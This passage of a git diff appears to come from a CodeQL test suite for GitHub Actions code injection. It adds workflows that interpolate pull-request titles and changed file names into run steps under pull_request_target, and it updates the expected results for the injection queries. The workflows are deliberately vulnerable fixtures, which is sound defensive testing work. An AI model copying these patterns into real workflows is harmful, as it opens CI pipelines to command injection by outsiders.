"${{ github.event.pull_request.title }}") >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink run: echo ${{ env.ISSUE_KEY }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml new file mode 100644 index 000000000000..6d925a82d372 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -0,0 +1,51 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "files=${FILES}" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test3: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test4: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml new file mode 100644 index 000000000000..a39967760e8e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml @@ -0,0 +1,38 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test3: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + test4: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 61c851a2cfa8..4c9ea8fe8ca4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -19,28 +19,28 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | -| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | -| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | -| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | provenance | | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | provenance | | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | provenance | | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | provenance | | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | provenance | | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | provenance | | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | provenance | | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | provenance | | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | provenance | | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | provenance | | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | provenance | | -| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | provenance | | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | provenance | | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | provenance | | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | provenance | | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | provenance | | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | provenance | | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | provenance | | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | provenance | | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | provenance | | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | provenance | | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | provenance | | +| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | semmle.label | github.event['pull_request']['body'] | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/untrusted_checkout1.yml:11:9:14:6 | Run Step: artifact [pr_number] | semmle.label | Run Step: artifact [pr_number] | | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index db8e7b485d76..262912c58a5e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ 